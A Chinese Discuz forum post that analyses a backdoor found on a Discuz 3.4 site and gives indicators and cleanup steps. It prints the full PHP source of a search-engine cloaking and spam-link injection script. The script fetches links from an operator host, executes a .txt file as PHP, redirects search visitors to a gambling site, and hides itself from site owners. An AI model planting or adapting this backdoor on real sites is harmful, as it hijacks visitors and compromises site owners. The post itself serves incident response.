
Discuz 3.4漏洞利用报告:网站后门木马文件案例 彩票黑链注入脚本 discuz 交流


本帖最后由 民审-M 于 2018-2-7 11:15 编辑

Discuz 3.4 漏洞利用报告:网站后门木马文件案例 —— 彩票黑链 / 友情链接黑链注入脚本。该脚本是典型的搜索引擎 cloaking(伪装)后门:对搜索引擎爬虫输出由模板和远程链接列表生成的垃圾页面与黑链,对从搜索引擎点击进来的真实访客用 header('Location') 跳转到脚本中硬编码的 958999a.com,对直接访问的普通用户(包括站长自己)不输出任何内容:

引入位置(脚本中硬编码的常量 APP_JACK_DOCUMENTROOT):
/static/space/t2/images/ 目录下的一组 *.txt 文件(zi.txt、moban.txt、bianliang*.txt、wen.txt、miaoshu.txt、hunhe.txt、app.txt)被脚本作为模板/数据读取;其中 app.txt 会被 include() 当作 PHP 代码执行,即后缀为 .txt 的文件实际上是可执行的 PHP。注意:下面的样本本身并未显示它是被 Discuz 的哪个文件引入的,排查时还需查找引入点。



案例黑链注入代码(样本原文):
<?php
// Hide PHP warnings/notices from visitors so the injected script leaves no
// visible trace on the page (several lines below would otherwise emit notices).
ini_set('html_errors',false);
ini_set('display_errors',false);
define("APP_INCLUDE_FLAG","TRUE");
define('APP_JACK_CHARSET','GBK');
header("Content-type: text/html; charset=".APP_JACK_CHARSET);
// Hard-coded absolute path to the Discuz static image directory holding the
// payload .txt files defined below (the "引入位置" noted in the post).
define('APP_JACK_DOCUMENTROOT','/home/wwwroot/discuz/domain/discuz.net/web/static/space/t2/images/');
// Remote, operator-controlled list of links, fetched at request time by
// replaceMyLink() and substituted into the generated page (one random line per
// {友情链接} placeholder).
define('MY_LINK_URL', 'http://www.wlbxsjs.com/l.txt');
$userAgent = strtolower($_SERVER['HTTP_USER_AGENT']);
// Both branches define the same three constants, so the Sogou User-Agent check
// has no effect in this sample (looks like a leftover of a per-engine config).
if (stristr($userAgent,"sogou")){
        define('APP_JACK_KEYWORD',APP_JACK_DOCUMENTROOT.'zi.txt');
        define('APP_JACK_TEMPLATE',APP_JACK_DOCUMENTROOT.'moban.txt');
        define('APP_JACK_BIANLIANG',APP_JACK_DOCUMENTROOT.'bianliang.txt');
}
else
{
        define('APP_JACK_KEYWORD',APP_JACK_DOCUMENTROOT.'zi.txt');
        define('APP_JACK_TEMPLATE',APP_JACK_DOCUMENTROOT.'moban.txt');
        define('APP_JACK_BIANLIANG',APP_JACK_DOCUMENTROOT.'bianliang.txt');
}
// File names are Chinese pinyin (zi = words/keywords, moban = template,
// bianliang = variable, wen = article, miaoshu = description, hunhe = mixed).
// Only APP_JACK_TEMPLATE (moban.txt) and APP_JACK_APPFILE are read by the code
// in this listing; the others are presumably consumed by the included app.txt.
define('APP_JACK_ARTICLE',APP_JACK_DOCUMENTROOT.'wen.txt');
define('APP_JACK_DES',APP_JACK_DOCUMENTROOT.'miaoshu.txt');
define('APP_JACK_BIANLIANG_B',APP_JACK_DOCUMENTROOT.'bianliang2.txt');
define('APP_JACK_BIANLIANG_C',APP_JACK_DOCUMENTROOT.'bianliang3.txt');
define('APP_MIX_KWD_FILE',APP_JACK_DOCUMENTROOT.'hunhe.txt');
// Defined but never read anywhere in this listing.
define('APP_JACK_CACHED','Uncached');
define('APP_JACK_MIN_PAR','3');
define('APP_JACK_MAX_PAR','3');
define('APP_JACK_MIN','10');        
define('APP_JACK_MAX','15');
// app.txt is pulled in with include() by missclient::run(), i.e. it is executed
// as PHP code despite the .txt extension -- the real payload lives there.
define('APP_JACK_APPFILE',APP_JACK_DOCUMENTROOT.'app.txt');

/**
 * Fabricate a discuz.net thread URL with a random thread id.
 *
 * The id range (9999999 .. 9999999999) is the same range missclient::run()
 * later treats as a "target" tid (> 9999999), so crawlers following these
 * links land on URLs where the cloaked content is served. mt_rand() is not a
 * CSPRNG; that is irrelevant here, the ids only need to look plausible.
 *
 * @return string absolute URL of the form http://www.discuz.net/thread-<tid>-1-1.html
 */
function App_GetLink(){
        $tid = mt_rand(9999999,9999999999);
        return sprintf('http://www.discuz.net/thread-%d-1-1.html', $tid);
}
/**
 * Fabricate a "self" discuz.net thread URL; byte-for-byte the same output
 * shape as App_GetLink() (random tid in 9999999 .. 9999999999). Not called
 * anywhere in this listing; presumably used by the included app.txt.
 *
 * @return string absolute URL of the form http://www.discuz.net/thread-<tid>-1-1.html
 */
function App_GetSelf(){
        $tid = mt_rand(9999999,9999999999);
        return sprintf('http://www.discuz.net/thread-%d-1-1.html', $tid);
}
/**
 * Return the URL of a random image (1..7000) on the operator's link.wlbxsjs.com
 * host. Not called in this listing; presumably used by the included app.txt
 * to decorate generated pages.
 *
 * @return string http://link.wlbxsjs.com/tupian/<n>.jpg
 */
function getImg(){
        $n = rand(1,7000);
        return sprintf('http://link.wlbxsjs.com/tupian/%d.jpg', $n);
}
// Executes on include, before the class declaration below -- valid because PHP
// hoists unconditional top-level class declarations. Everything this script
// does happens inside run().
$my_app = new missclient();
$my_app->run();

/**
 * Search-engine cloaking handler.
 *
 * Per request, run() picks one of three behaviours:
 *   - crawler (isSpider) on a target URL  -> execute app.txt and print the
 *     generated doorway page (placeholders filled from moban.txt, links from
 *     MY_LINK_URL);
 *   - crawler on a non-target URL          -> print five hidden links to
 *     fabricated thread URLs so the crawler discovers the target tid range;
 *   - human visitor referred by a search engine on a target URL -> redirect
 *     to the external site hard-coded in Jump(); anyone else gets no output.
 *
 * Operator IPs listed in allow_ip and anyone carrying the
 * "domain-filter-bypass" cookie are exempted from the redirect, so the site
 * owner browsing normally sees nothing unusual.
 */
class missclient{
        
        public $show_spider;
        public $jump_ref;           // referer substrings that identify a search engine
        public $http_ref_filter;    // referer substrings (search operators) that exempt a visitor
        public $jump_url = "";
        public $domain = "";        // current host, from getServerName()
        public $condition = "";     // true when tid > 9999999 and the IP is not excluded
        public $app_server = "";    // remote content server, only used by getPage()
        public $log_spider = "";    // path of a crawler log; empty here, so nothing is logged
        public $cur_spider = "";    // key of the matched crawler from isSpider()
        public $allow_ip = "";      // '|'-separated IP substrings that are EXCLUDED (see isAllowdIp)
        public $isCache = false;    // hard-coded false below, cache branch is dead

        /**
         * Entry point; dispatches on crawler / referer / target-URL state.
         * Output paths end in exit()/die(), so nothing after this script runs
         * when cloaked content or a redirect is served.
         */
        public function run(){
                $this->domain = $this->getServerName();
                $this->jump_ref = explode("|","360.|haoso.|bing.|google.|sogou.|soso.|so.com|.sm.cn|.youdao|.yisou|.easou|.etao|.chinaso");
                // Referers containing site:/inurl: operators (someone investigating
                // the site through search queries) are exempted in isRef().
                $this->http_ref_filter = explode("|","inurl:|site:|site%3A|inurl%3A");
                // Despite the name, this is an exclusion list: isAllowdIp() returns
                // false for any client IP containing one of these substrings.
                $this->allow_ip = "218.80.218.|10.4.62.|10.4.33";
                // Only thread ids above 9999999 are targeted -- the same range the
                // fabricated links from App_GetLink() use. An absent tid compares false.
                $this->condition = ($_GET['tid']> 9999999 && $this->isAllowdIp());
                // Used by getPage(), which nothing in this listing calls.
                $this->app_server = "http://www.sohu999.com/gbk/app.php";
                // Hard-coded false: the whole cache branch below is dead in this sample.
                $this->isCache  = False;
                if($this->isSpider() && $this->isAllowdIp()){
                                if($this->condition){
                                        if($this->isCache){
                                                // Cache keyed by host (6 chars of md5) and query string, under a
                                                // world-writable (0777) directory in /tmp or C:/windows/temp.
                                                $relset_host = $this->getServerName();
                                                $dir = (substr(PHP_OS, 0, 3) == 'WIN' ? 'C:/windows/temp/' : '/tmp/') . substr(md5($relset_host), 26) . chr(47);
                                                $cacheFile = $dir.'sess_' . substr(md5(http_build_query($_GET)), 6);
                                                if(!@file_exists($dir)){
                                              mkdir($dir, 0777);
                                    }
                                                if(@file_exists($cacheFile) && @filesize ($cacheFile) > 32 ){
                                                        // Variables are unserialize()d from the cache file (coreAppCache::read).
                                                        $var = coreAppCache::read($cacheFile);
                                                        $page = file_get_contents(APP_JACK_TEMPLATE);
                                                        // Fill {key} placeholders in moban.txt, then expand links/pseudo-tags.
                                                        foreach($var as $key=>$v){
                                                                $flag = "{".$key."}";
                                                                $page = str_replace($flag,$v,$page);
                                                        }
                                                        echo myReplace($page);
                                                        exit();
                                                }
                                                else
                                                {        
                                                        // "just include the APP file": app.txt is executed as PHP and its
                                                        // return value must carry a base64/gzip/serialized block between
                                                        // <explode> and </explode>, which is then unserialize()d.
                                                        $currentPage = include(APP_JACK_APPFILE);
                                                if($currentPage && strlen($currentPage) > 32 && stristr($currentPage,"</explode>")){
                                                                $var = self::cut($currentPage,"<explode>","</explode>");
                                                                $var = coreAppCache::decode($var);
                                                                $page = file_get_contents(APP_JACK_TEMPLATE);
                                                                foreach($var as $key=>$v){
                                                                        $flag = "{".$key."}";
                                                                        $page = str_replace($flag,$v,$page);
                                                                }
                                echo myReplace($page);
                                                                // Raw app output is written back as the cache file for next time.
                                                                @coreAppCache::writenocode($currentPage,$cacheFile);
                                                        }
                                                }
                                                die();
                                        }
                                        else
                                        {
                                                // Live path in this sample: execute app.txt and print its return
                                                // value after link/pseudo-tag expansion by myReplace().
                                                $currentPage = include(APP_JACK_APPFILE);
                                                echo myReplace($currentPage);
                                                die();
                                        }
                                }
                                else
                                {

                                        // Crawler on a non-target URL: seed it with hidden links to target URLs.
                                        $this->_uncondition_hook();
                                }
                }
                else
                {        
                        // Not a crawler (or an excluded IP): redirect search-engine referrals
                        // on target URLs, do nothing for everyone else.
                        if($this->isRef() && $this->condition){
                                $this->Jump();
                        }
                        else
                        {
                                $this->_unSpider_hook();
                        }
                }
        }

        /**
         * Returns false when the client IP contains any substring from allow_ip,
         * true otherwise -- i.e. an exclusion list (presumably the operator's own
         * addresses; the listing does not say). Matching is stristr(), so "10.4.33"
         * also matches e.g. "210.4.33.5".
         */
        public function isAllowdIp(){
                $ip = $this->clientIp();
                $non_list = explode("|",$this->allow_ip);
                foreach($non_list as $iplist){
                        if(@stristr($ip,$iplist)){
                                return false;
                        }
                }
                return true;
        }

        /**
         * Client IP, preferring the HTTP_CLIENT_IP and HTTP_X_FORWARDED_FOR request
         * headers over REMOTE_ADDR -- so the value is spoofable by the requester.
         * Returns the first 7-15 character run of digits/dots, or 'unknown' when
         * nothing matches (including when no source is set at all).
         */
        public function clientIp(){
                if(getenv('HTTP_CLIENT_IP') && strcasecmp(getenv('HTTP_CLIENT_IP'), 'unknown')) {
                        $onlineip = getenv('HTTP_CLIENT_IP');
                } elseif(getenv('HTTP_X_FORWARDED_FOR') && strcasecmp(getenv('HTTP_X_FORWARDED_FOR'), 'unknown')) {
                        $onlineip = getenv('HTTP_X_FORWARDED_FOR');
                } elseif(getenv('REMOTE_ADDR') && strcasecmp(getenv('REMOTE_ADDR'), 'unknown')) {
                        $onlineip = getenv('REMOTE_ADDR');
                } elseif(isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], 'unknown')) {
                        $onlineip = $_SERVER['REMOTE_ADDR'];
                }
                preg_match("/[\d\.]{7,15}/", $onlineip, $onlineipmatches);
                $onlineip = $onlineipmatches[0] ? $onlineipmatches[0] : 'unknown';
                unset($onlineipmatches);
                return $onlineip;
        }

        /**
         * True if the User-Agent contains one of the crawler tokens below
         * (case-insensitive). Sets cur_spider to the matched key; appends a line
         * to log_spider only when that path is non-empty (never, in this listing).
         *
         * Note: 'Sogou' is used as the array key seven times. In a PHP array
         * literal the last value for a duplicate key wins, so only
         * 'Sogou web spider' is actually matched; the other Sogou tokens are lost.
         */
        public function isSpider(){
                $bots = array(
                                                'Google'        => 'Googlebot',
                                                'MSN'        => 'MSNbot',
                                                'Soso'        => 'Sosospider',
                                                'Youdao'        => 'Youdaobot',
                                                'Yodao'        => 'Yodaobot',
                                                'Yisou'        => 'Yisouspider',
                                                'Easou'        => 'Easouspider',
                                                'Etao'        => 'Etaospider',
                                                'Chinaso'        => 'Chinasospider',
                                                'Baidu'        => 'Baiduspider',
                                                'Sogou'        => 'Sogou news Spider',
                                                'Sogou'        => 'Sogou orion spider',
                                                'Sogou'        => 'Sogou news Spider',
                                                'Sogou'        => 'Sogou blog',
                                                'Sogou'        => 'Sogou spider2',
                                                'Sogou'        => 'Sogou inst spider',
                                                'Sogou'        => 'Sogou web spider',
                                                'Haoso'        => 'haosouspider',
                                                '360spider'        => '360spider',
                                                'bingbot'        => 'bingbot'
                 );
                $userAgent = strtolower($_SERVER['HTTP_USER_AGENT']);
                foreach ($bots as $k => $v){
                        if (stristr($userAgent,$v)){
                                if(!empty($this->log_spider)){
                                        @file_put_contents($this->log_spider,$v."->Visited ".$_SERVER['QUERY_STRING']."at: ".date("Y-m-d H:i:s")."\n",FILE_APPEND);
                                }
                                $this->cur_spider = $k;
                                return true;
                                break;   // unreachable after return
                        }
                }
                return false;        
        }

        /**
         * Decides whether a human visitor came from a search engine.
         *  - A "domain-filter-bypass" cookie exempts the visitor (returns false).
         *  - Excluded IPs and referers containing site:/inurl: operators receive
         *    that cookie for 259200 s (3 days) and are exempted: whoever reaches
         *    the site while investigating it stops seeing the redirect.
         *  - Returns true when the referer contains a jump_ref domain.
         *  - Otherwise falls off the end and returns null (falsy).
         */
        public function isRef(){
                $ref = strtolower(@$_SERVER['HTTP_REFERER']);
                if(isset($_COOKIE["domain-filter-bypass"])){
                        return false;
                }
                
                if(!$this->isAllowdIp()){
                        setcookie("domain-filter-bypass", "lol", time() + 259200);
                        return false;
                }

                foreach($this->http_ref_filter as $r){
                        $r = trim($r);
                        if(stristr($ref,$r)){
                                setcookie("domain-filter-bypass", "lol", time() + 259200);
                                return false;
                        }
                }
        
                foreach($this->jump_ref as $r){
                        $r = trim($r);
                        if(stristr($ref,$r)){
                                return true;
                        }
                }
        }

        /**
         * Lower-cased SERVER_NAME, falling back to HTTP_HOST. The 'http://' strip
         * only runs when strpos() is non-zero, so a *leading* 'http://' is never
         * removed (position 0 is falsy).
         */
        public function getServerName() 
        { 
                $ServerName = strtolower($_SERVER['SERVER_NAME']?$_SERVER['SERVER_NAME']:$_SERVER['HTTP_HOST']); 
                if( strpos($ServerName,'http://') ) 
                { 
                        return str_replace('http://','',$ServerName); 
                } 
                return $ServerName; 
        }

        /**
         * Fetches generated content from app_server, passing the host, the matched
         * crawler, the cache flag and the original query string. $cache is
         * undefined when isCache is false. Not called anywhere in this listing.
         */
        public function getPage(){
                if($this->isCache){
                        $cache="cached";
                }
                $url  = $this->app_server."?domain=".$this->domain."&gid=199&spider=".$this->cur_spider."&cache=".$cache."&localPar=".http_build_query($_GET);
                return $this->HttpVisit($url);
        }

    /**
     * Plain HTTP GET of $weburl, trying cURL, then file_get_contents with a
     * stream context, then a hand-rolled fsockopen request (assumes an
     * 'http://' URL; port 80 unless the host part is host:port). All failures
     * are @-suppressed. Returns the body (cURL/stream paths) or the raw
     * response including headers (fsockopen path), or NULL/empty on failure.
     * Used by replaceMyLink() to pull the remote link list.
     */
    public function HttpVisit($weburl) {
        $remote_data = NULL;
        if (function_exists('curl_exec')) {
            $curl = @curl_init();
            @curl_setopt($curl, CURLOPT_URL, $weburl);
            @curl_setopt($curl, CURLOPT_HEADER, 0);
            @curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 30);
            @curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
            $remote_data = @curl_exec($curl);
            @curl_close($curl);
        } else {
            if (function_exists('stream_context_create')) {
                $header_array = array('http' => array('method' => 'GET', 'timeout' => 30));
                $http_header = @stream_context_create($header_array);
                $remote_data = @file_get_contents($weburl, false, $http_header);
            } else {
                // Host is URL component 2 after splitting on '/'; path starts 7 bytes
                // ('http://') past the host.
                $temp_url = explode("/", $weburl);
                $new_url = $temp_url[2];
                $http_port = 80;
                $get_file = substr($weburl, strlen($new_url) + 7);
                if (strstr($new_url, chr(58))) {
                    $s_var_array['td'] = explode(chr(58), $new_url);
                    $new_url = $s_var_array['td'][0];
                    $http_port = $s_var_array['td'][1];
                }
                $fsock_result = @fsockopen($new_url, $http_port);
                @fputs($fsock_result, 'GET ' . $get_file . ' HTTP/1.1' . "\r\n" . 'Host:' . $new_url . "\r\n" . 'Connection:Close' . "\r\n\r\n");
                while (!feof($fsock_result)) {
                    $remote_data .= fgets($fsock_result, 1024);
                }
                @fclose($fsock_result);
            }
        }
        return $remote_data;
    }

        /**
         * Redirects (header Location, i.e. 302) to the hard-coded external site,
         * tagging the compromised host in the query string with dots replaced by
         * underscores (presumably for per-site tracking). The sogou./bing.
         * checks are redundant: the final block redirects any non-excluded IP
         * regardless of referer -- isRef() has already required one.
         */
        public function Jump(){
                $ref = strtolower(@$_SERVER['HTTP_REFERER']);
                if($this->isAllowdIp() && stristr($ref,"sogou.")){
                        $domain  = str_replace(".","_",$this->domain);
                        header('Location: https://958999a.com/?jpb_'.$domain);
                        exit;
                }
                $ref = strtolower(@$_SERVER['HTTP_REFERER']);
                if($this->isAllowdIp() && stristr($ref,"bing.")){
                        $domain  = str_replace(".","_",$this->domain);
                        header('Location: https://958999a.com/?jpb_'.$domain);
                        exit;
                }
                if($this->isAllowdIp()){
                        $domain  = str_replace(".","_",$this->domain);
                        header('Location: https://958999a.com/?jpb_'.$domain);
                        exit;
                }
        }
        
        /**
         * Crawler on a non-target URL: emits five <a> tags with no anchor text
         * (invisible in a browser) pointing at fabricated thread URLs, so the
         * crawler discovers the targeted tid range. $array is unused.
         */
        public function _uncondition_hook(){
                $array = array();
                for($a=0;$a<5;$a++){
                        echo '<a href="'.App_GetLink().'"></a>'."\n";
                }
        }

        /**
         * No-op: ordinary visitors receive no output from this script, which is
         * why the infection is invisible to the site owner browsing normally.
         */
        public function _unSpider_hook(){
                //
        }


        /** Prefix test via substr(). Not called in this listing. */
        public function strStartWith($needle, $haystack){
            return (substr($haystack, 0, strlen($needle))==$needle);
        }

        /** Random lowercase alphanumeric string using rand(). Not called in this listing. */
        public function rndStr($length=8){
                $str = null;
                $strPol = "0123456789abcdefghijklmnopqrstuvwxyz";
                $max = strlen($strPol)-1;
                for($i=0;$i<$length;$i++){
                        $str.=$strPol[rand(0,$max)];
                }
                return $str;
        }

        /**
         * Text between the first $from and the next $end in $file. When $from is
         * absent, $message[1] is undefined and the result is an empty string.
         * Duplicated in coreAppCache::cut.
         */
        public function cut($file,$from,$end)
        { 
                $message=explode($from,$file); 
                $message=explode($end,$message[1]); 
                return   $message[0];
        }
}

/**
 * Serialization helpers for the doorway-page cache.
 *
 * Payload format: serialize() -> gzcompress() -> base64_encode(), optionally
 * wrapped in <explode>...</explode>. decode() therefore calls unserialize() on
 * whatever is in the cache file (which lives in a 0777 directory under /tmp,
 * see missclient::run) or in the output of the included app.txt.
 *
 * All methods are declared as instance methods but are invoked statically
 * (coreAppCache::read / ::decode / ::writenocode in missclient::run). That is
 * a deprecation on PHP 7 and a fatal Error on PHP 8; it only matters on the
 * isCache branch, which is dead in this sample.
 */
class coreAppCache{
        // write cache: serialize + compress + base64, then store
        public function write($file,$filename){
                return file_put_contents($filename,self::encode($file));
        }
        /** Store $file as-is (no encoding); used for the raw app.txt output. */
        public function writenocode($file,$filename){
                return file_put_contents($filename,$file);
        }
        /** Read a cache file, strip the <explode> wrapper if present, and unserialize. */
        public function read($filename){
                $content = file_get_contents($filename);
                if(stristr($content,"</explode>")){
                        $content = self::cut($content,"<explode>","</explode>");
                }
                return self::decode($content);
        }

        public function encode($file){
                return base64_encode(gzcompress(serialize($file))); 
        }

        // unserialize() on file/remote-derived data -- object injection surface if
        // anything else on the host can write the /tmp cache directory.
        public function decode($file){
                return unserialize(gzuncompress(base64_decode($file))); 
        }
        
        /** Text between the first $from and the next $end (same as missclient::cut). */
        public function cut($file,$from,$end)
        { 
                $message=explode($from,$file); 
                $message=explode($end,$message[1]); 
                return   $message[0];
        }
}

/**
 * Strip a leading/trailing UTF-8 BOM (U+FEFF) together with any Unicode
 * separators (\pZ) and control characters (\p{Cc}) from both ends of $str.
 * Used on the body fetched from MY_LINK_URL before it is split into lines.
 *
 * @param string $str input text (must be valid UTF-8; the /u modifier makes
 *                    preg_replace return null on malformed input)
 * @return string|null trimmed text, or null on a PCRE error
 */
function removeBom($str) {
    static $edgePattern = '/^[\pZ\p{Cc}\x{feff}]+|[\pZ\p{Cc}\x{feff}]+$/ux';

    return preg_replace($edgePattern, '', $str);
}

/**
 * preg_replace_callback callback for {友情链接N} placeholders (see myLinkHandler).
 *
 * On first use per request it downloads MY_LINK_URL through missclient::HttpVisit,
 * strips the BOM, splits on PHP_EOL and drops blank lines; the list is kept in a
 * static so the fetch happens once. Each call returns one random line from it,
 * so the injected links are fully controlled by the remote operator at request
 * time. $str (the match array) is ignored. If the download fails the list is
 * empty and array_rand() errors out (ValueError on PHP 8).
 */
function replaceMyLink($str) {
    static $myLinks;

    if (is_null($myLinks)) {
        $c = new missclient();
        $contents = removeBom($c->HttpVisit(MY_LINK_URL));
        $contents = array_filter(array_map('trim', explode(PHP_EOL, $contents)));

        $myLinks = $contents;
    }

    $linkIndex = array_rand($myLinks, 1);
    $link = $myLinks[$linkIndex];

    return $link;
}

/**
 * Replace every "{友情链接}" / "{友情链接<digits>}" placeholder ("friendly links",
 * i.e. link-exchange slots) in $str with a random remote link via replaceMyLink().
 * Whitespace inside the braces is tolerated; matching is case-insensitive.
 */
function myLinkHandler($str) {
    return preg_replace_callback('#\{\s*友情链接\d*\s*\}#si', 'replaceMyLink', $str);
}

/**
 * Post-process generated page text before it is echoed.
 *
 * 1. Substitute {友情链接} placeholders with remote links (myLinkHandler).
 * 2. Find pseudo-tags of the form "<?= name(arg1,arg2) ?>" and, if a PHP
 *    function called `name` exists, invoke it with the comma-split arguments
 *    via call_user_func_array(); the first occurrence of the tag is replaced by
 *    the return value (str_replace_first).
 *
 * Step 2 is a generic function-call primitive: any PHP function named inside
 * the template (moban.txt) or the app.txt output is executed. Arguments are
 * plain strings split on ',' with no unescaping.
 */
function myReplace($str) {
    $str = myLinkHandler($str);

    preg_match_all('#<\?=\s*([^\)]+)\(([^\)]+)\)\s*\?>#i', $str, $arr, PREG_SET_ORDER);
    foreach ($arr as $item) {
        if (isset($item[1], $item[2]) && function_exists($item[1])) {
            $a = call_user_func_array($item[1], explode(',', $item[2]));
            $str = str_replace_first($item[0], $a, $str);
        }
    }

    return $str;
}

/**
 * Replace only the first occurrence of $from in $subject (case-insensitive).
 *
 * Built on preg_replace() with limit 1. Two quirks are preserved from the
 * original: the pattern uses '@' as delimiter while preg_quote() is told to
 * escape for '/', so a $from containing '@' produces an invalid pattern and
 * the call returns null; and $to is a PCRE replacement string, so "$1" / "\\1"
 * sequences in it are interpreted rather than inserted literally.
 *
 * @param string $from    literal text to find
 * @param string $to      replacement (PCRE replacement semantics)
 * @param string $subject text to search
 * @return string|null    result, or null on a PCRE error
 */
function str_replace_first($from, $to, $subject)
{
    $pattern = sprintf('@%s@si', preg_quote($from, '/'));

    return preg_replace($pattern, $to, $subject, 1);
}

/**
 * Random numeric string.
 *
 * Draws $len digits from a pool of "0".."9" (each present three times) that is
 * shuffled first. When $mLen is a positive number the actual length is chosen
 * uniformly from the inclusive range between $len and $mLen (in either order).
 * Uses shuffle()/mt_rand() only -- not suitable for anything secret.
 *
 * @param int      $len  requested length (or one end of the length range)
 * @param int|null $mLen optional other end of the length range
 * @return string digits only; '' when the chosen length is 0
 */
function randKey($len, $mLen = null)
{
    $pool = str_split("012345678901234567890123456789");
    if ($mLen && $mLen > 0) {
        $bounds = range(min($len, $mLen), max($mLen, $len));
        $len = $bounds[array_rand($bounds)];
    }

    shuffle($pool);
    $lastIdx = count($pool) - 1;
    $key = "";
    $i = 0;
    while ($i < $len) {
        $key .= $pool[mt_rand(0, $lastIdx)];
        $i++;
    }
    return trim($key);
}
?>


该脚本一旦被引入即可挂载黑链并对搜索引擎流量做劫持跳转,请站长引起重视。排查要点(均对应上述代码):1)检查 /static/space/t2/images/ 下是否存在 zi.txt、moban.txt、bianliang.txt、bianliang2.txt、bianliang3.txt、wen.txt、miaoshu.txt、hunhe.txt、app.txt 等不明 txt 文件,其中 app.txt 会被 include() 当作 PHP 代码执行;2)全站 grep 关键字 missclient、coreAppCache、APP_JACK_、domain-filter-bypass,以及外联域名 wlbxsjs.com、sohu999.com、958999a.com;3)本文样本并未显示它是被 Discuz 哪个文件引入的,需自行检查模板与公共文件中的 include/require 引入点;4)该脚本对普通访问者不输出任何内容,站长直接浏览看不出异常,验证时应使用爬虫 UA(如 Baiduspider)、带搜索引擎 Referer,访问 tid 大于 9999999 的帖子 URL;5)清理 /tmp(Windows 为 C:/windows/temp)下以 6 位 md5 片段命名的目录中的 sess_* 缓存文件;6)脚本通过 HTTP_CLIENT_IP / X-Forwarded-For 头判断来源 IP,并会给排查者种下 domain-filter-bypass cookie 使其三天内不再跳转,测试前请清除该 cookie。